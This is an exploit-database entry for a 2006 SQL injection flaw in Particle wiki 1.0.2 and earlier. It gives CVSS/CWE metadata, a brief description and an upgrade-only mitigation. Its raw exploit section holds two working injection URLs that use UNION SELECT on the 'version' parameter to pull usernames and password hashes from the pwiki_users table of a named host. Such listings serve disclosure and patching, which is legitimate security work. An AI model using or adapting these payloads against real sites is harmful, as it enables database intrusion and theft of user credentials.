header-logo
Suggest Exploit
vendor:
Particle wiki
by:
FarhadKey
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Particle wiki
Affected Version From: 1.0.2 and prior
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: a:particlesoft:particle_wiki
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Particle wiki <= 1.0.2 Remote SQL_Injection - Username/Password(hash) Extractor

Particle wiki version 1.0.2 and prior are vulnerable to a remote SQL injection attack. An attacker can exploit this vulnerability to extract usernames and passwords (in hash form) from the database. The exploit involves sending a specially crafted HTTP request to the vulnerable application. The request contains a malicious SQL query that when executed, will return the username and password of all users in the database.

Mitigation:

Upgrade to the latest version of Particle wiki.
Source

Exploit-DB raw data:

# Particle wiki <= 1.0.2 Remote SQL_Injection - Username/Password(hash) Extractor
# Thanks to UNSECURED SYSTEMS : http://pridels.blogspot.com/2006/06/particle-wiki-sql-inj.html
# Exploited by FarhadKey from http://www.kapda.ir

Username :
http://wiki.particlesoft.net/index.php?version=-1%20union%20select%201,1,1,1,1,username%20from%20pwiki_users%20/*
Password :
http://wiki.particlesoft.net/index.php?version=-1%20union%20select%201,1,1,1,1,password%20from%20pwiki_users%20/*

# milw0rm.com [2006-06-05]